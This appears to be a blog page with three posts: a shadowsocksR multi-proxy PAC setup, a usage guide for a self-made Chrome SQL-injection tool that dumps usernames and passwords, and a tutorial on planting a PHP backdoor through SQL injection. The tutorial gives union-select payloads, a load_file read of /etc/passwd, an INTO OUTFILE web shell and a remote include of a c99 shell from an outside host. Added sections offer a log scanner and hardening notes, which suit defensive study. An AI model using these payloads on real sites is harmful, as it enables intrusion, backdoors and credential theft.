Wednesday, August 2, 2017

Connecting to multiple shadowsocksR/proxy handlers at the same time on Windows

Requirements:
2 or more configurations
shadowsocksR
Notepad/Sublime

Procedure:
First, make 2 or more copies of the shadowsocksR folder.

Go to the first shadowsocksR folder, then edit the gui-config.json file using Notepad/Sublime.
Find the localPort and change its value to 1080.

Next, go to the second shadowsocksR folder, then edit its gui-config.json.
Find the localPort there and change its value to 1081.

Follow the same procedure for the third shadowsocksR folder, but change the localPort to 1082.
Then for the fourth shadowsocksR, the localPort is 1083.
And so on.
Now you've configured the shadowsocksR folders.
Run each one of them.

Next, configure each shadowsocksR for your manual proxy configuration.
Example for the first shadowsocksR:

For the second:

And so on.
Now our shadowsocksR instances are ready,
it's time to learn how to make a PAC file!

What is a PAC file?
PAC stands for "Proxy Auto-Configuration", which describes itself.
It's used for directing requests to proxies.
This is easy to learn because its syntax is JavaScript.

So first, create a new text file on your hard disk drive and name it pac.txt

Next, edit that PAC file and create a JavaScript function named FindProxyForURL with the parameters url and host.

Now that we've created a function, we need to make an array of our shadowsocks proxies.

Now that we're done listing our shadowsocks proxies, we need to make the PAC script select one entry of the ssProxies array randomly.

Now the proxy variable could be 127.0.0.1:1080, 127.0.0.1:1081 or 127.0.0.1:1082. Next, we need to return to the client the proxy to connect to.

Full code :

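function FindProxyForURL(url, host) {
    // Local shadowsocksR listeners configured above
    var ssProxies = ["127.0.0.1:1080", "127.0.0.1:1081", "127.0.0.1:1082"];
    // Pick one listener at random for each request
    var proxy = ssProxies[Math.floor(Math.random() * ssProxies.length)];
    return "PROXY " + proxy;
}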

And now, we're done! All we have left to do is configure our browser and IDM!
Go to the settings of Chrome > Open proxy settings > LAN settings.
Then replicate this setting:

It depends on where you saved the pac.txt.
And now, every time you browse, it will randomly connect through one of the shadowsocks!
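
A variant of the PAC script above, added here as an example and not part of the original post: it still starts at a random listener, but returns all of them as a failover chain so a stopped shadowsocksR instance does not break browsing, and it sends loopback and dotless intranet names DIRECT. The helper names buildProxyChain and isLocalHost are assumptions, and the code sticks to old-style JavaScript because PAC engines may not support newer syntax.

```javascript
// Added example. Assumption: three local shadowsocksR listeners on
// ports 1080-1082, as configured earlier in this post.
var ssProxies = ["127.0.0.1:1080", "127.0.0.1:1081", "127.0.0.1:1082"];

// Build "PROXY a; PROXY b; PROXY c" starting at index `start` and wrapping
// around, so the client falls through to the next listener if one is down.
function buildProxyChain(proxies, start) {
  var parts = [];
  for (var i = 0; i < proxies.length; i++) {
    parts.push("PROXY " + proxies[(start + i) % proxies.length]);
  }
  return parts.join("; ");
}

// Hosts that should not be sent through a proxy: loopback addresses and
// dotless intranet names (the ':' check keeps other IPv6 literals proxied).
function isLocalHost(host) {
  return host === "localhost" || host === "127.0.0.1" || host === "[::1]" ||
         (host.indexOf(".") === -1 && host.indexOf(":") === -1);
}

function FindProxyForURL(url, host) {
  if (isLocalHost(host)) {
    return "DIRECT";
  }
  // Random starting point spreads requests across the listeners.
  var start = Math.floor(Math.random() * ssProxies.length);
  return buildProxyChain(ssProxies, start);
}
```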

For how to configure IDM, see here:


You're welcome.

Monday, June 5, 2017

A powerful Chrome extension SQL injector made by me.


SQL-Injector

A Chrome extension for SQL injection using union-based and error-based techniques

How To Install:

Go to chrome://extensions, then drag and drop the SQL injector folder. To open it, go to the options of the Chrome extension.

How To Use:

To use this tool, simply put your target URL in the url textbox.
Put '_INJECTHERE_' (without quotes) where the tool will inject.
Example:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1_INJECTHERE_
Click the start button and it will start scanning whether it's vulnerable or not.
First, the tool will check if the page changes on every visit.
If it does, you need to take a piece of text that is in the normal page.
Example:
website.com/page.php?id=19
Costs: 5 pesos only!
website.com/page.php?id=19'
Costs: only!
You see that the phrase '5 pesos' disappears.
So you will put that phrase in normalPageKeyword and click start again.
After that, the tool will check if there's a difference between the normal page and the errored page (the URL with the quote, id=19').
If the normal page is the same as the error page, then maybe it's not vulnerable, so you gotta find another target URL.
If it's not the same as the error page, then the tool will now try to get the right comment.
There are different types of comment depending on SQL syntax:
'--+
--
#
)--+
')--+
"--+
etc.
If the tool cannot find the right comment, you may need to get the right comment yourself and put it in the comment textbox.
For example, if the right comment is " '--+ ", then you need to put " '_PAYLOAD--+ " in the comment textbox, then click start again.
Then the tool will start trying to get the vulnerable columns.
It will try to use the order by and group by methods.
If the tool can't, then you gotta count them yourself and put the count in the numberOfColumns textbox.
Then the tool will start trying to get the injectable columns.
If the tool can't, then you gotta get them yourself and put them in the injectableColumn textbox.
Once you have the comment type, number of columns and injectable columns,
you can start gathering information.
First, let's try getting the version, user and currentDB.
After that, click the [GET] button in the database panel.
It will dump the database names. If you already have the database name, you can put it in the addDatabase textbox, then click the '>' button.
Then select the database you want, then click [GET] in the table panel to get the tables.
The same goes for the columns.
After that, you will dump the data.
You can select multiple columns that you want to dump.
For example:
you chose the username column and the password column,
so it will be username,0x3a,password
The 0x3a is ':' to separate the username and password.
Result: admin:admin123,test1:testing123,z3r:z3r19

SQL Injection Uploading shell using root file privileges 70% Noob

!! FOR EDUCATIONAL PURPOSES ONLY  !!

I Introduction
So today I'm gonna teach you how to upload a shell using SQL injection

II Getting User
So first, get the user using
user()
Or
(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)

www.website.com/news.php?id=19' and false union select 1,user(),3,4,5,6,7,8,9--+

www.website.com/news.php?id=19' and false union select 1,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),3,4,5,6,7,8,9--+

If the user is root or the user privilege is Y or Yes, then you're good to go.

III Getting the Full Path Disclosure
I've written a tutorial on how to get the Full Path Disclosure here.

Note: if you can't get the Full Path Disclosure, there's no way you can upload your shell if you don't know where to save your backdoor shell.

Tips: Getting Full Path Disclosure

For some tips: if you really want to know the FPD, try reading the server's "/etc/passwd" using load_file().

www.website.com/news.php?id=19' and false union select 1,load_file("/etc/passwd"),3,4,5,6,7,8,9--+

Or if you still can't, try guessing the FPD. The common ones are "/var/www/", "/var/www/sitename", etc.

To make sure that they're correct, try "/var/www/index.php" and visit www.website.com/index.php, then check if the source code is similar or the same.

IV Uploading the shell
Now that we have the full path disclosure, we can now try uploading the shell. We're gonna use this script for our backdoor initiator:
<?php include $_GET["inc"];?>
www.website.com/news.php?id=19' and false union select 1,'<?php include($_GET["inc"]);?>',3,4,5,6,7,8,9 into outfile '/var/www/shell.php'--+
So once we visit that url, we will now go here:

www.website.com/shell.php?inc=http://examplebackdoorwebsite.com/c99.txt

And voilà! You have successfully inserted a PHP backdoor in the website!

If it's 404 not found, then maybe the directory is not writable. You gotta find some directories that are writable.
The common writable directories are:
/uploads/
/images/
/videos/
or something like that.

V Goodbye
Hope you learned something with my tutorial! I guess it's your job to enhance and explore. Good luck and have fun hacking!!
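
From the defender's side, the requests described in the two SQL injection posts above (UNION SELECT, ORDER BY / GROUP BY column counting, INFORMATION_SCHEMA queries, load_file(), INTO OUTFILE and the inc= remote include) all leave recognisable request targets in web server access logs. The scanner below is an added example, not code from the original posts; the rule names and the sample lines are constructed for illustration.

```javascript
// Added example (not from the original posts). Rule names are assumptions.
var RULES = [
  { name: "union-select",   re: /\bunion\b[\s\S]{0,40}?\bselect\b/i },
  { name: "file-read",      re: /\bload_file\s*\(/i },
  { name: "file-write",     re: /\binto\s+(out|dump)file\b/i },
  { name: "schema-enum",    re: /\binformation_schema\b/i },
  { name: "column-count",   re: /\b(order|group)\s+by\s+\d+/i },
  // Noisy on legitimate redirect parameters: treat as a lead, not a verdict.
  { name: "remote-include", re: /[?&][^=&\s]+=(https?|ftp):\/\//i }
];

// Undo the encodings seen in the URLs above so the rules match plain text.
function normalize(raw) {
  var s = raw.replace(/\+/g, " ");              // '+' means space in a query string
  for (var i = 0; i < 2; i++) {                 // also catches double URL-encoding
    try { s = decodeURIComponent(s); } catch (e) { break; } // malformed: keep as-is
  }
  // Inline SQL comments are often used in place of spaces; collapse them.
  return s.replace(/\/\*[\s\S]*?\*\//g, " ").replace(/\s+/g, " ");
}

// Return the names of all rules that match one request target.
function scanRequest(requestTarget) {
  var text = normalize(requestTarget);
  var hits = [];
  for (var i = 0; i < RULES.length; i++) {
    if (RULES[i].re.test(text)) hits.push(RULES[i].name);
  }
  return hits;
}

// Return only the suspicious lines, each with the rules it triggered.
function scanLog(lines) {
  return lines.map(function (l) { return { line: l, hits: scanRequest(l) }; })
              .filter(function (r) { return r.hits.length > 0; });
}

// Constructed request targets modelled on the URLs in this page.
var SAMPLE_LOG = [
  "/news.php?id=19",
  "/news.php?id=19'+and+false+union+select+1,user(),3--+",
  "/news.php?id=19'%20union%20select%201,load_file(%22/etc/passwd%22),3--+",
  "/news.php?id=19'+union+select+1,'x',3+into+outfile+'/var/www/x.php'--+",
  "/shell.php?inc=http://example.invalid/a.txt",
  "/search?q=student+union+elections"
];
console.log(scanLog(SAMPLE_LOG));
```

On the database side, load_file() and INTO OUTFILE both require MySQL's FILE privilege and are limited by secure_file_priv, so an application account without FILE removes the file read and write steps even where an injection exists. The remote include in section IV additionally depends on PHP's allow_url_include being enabled.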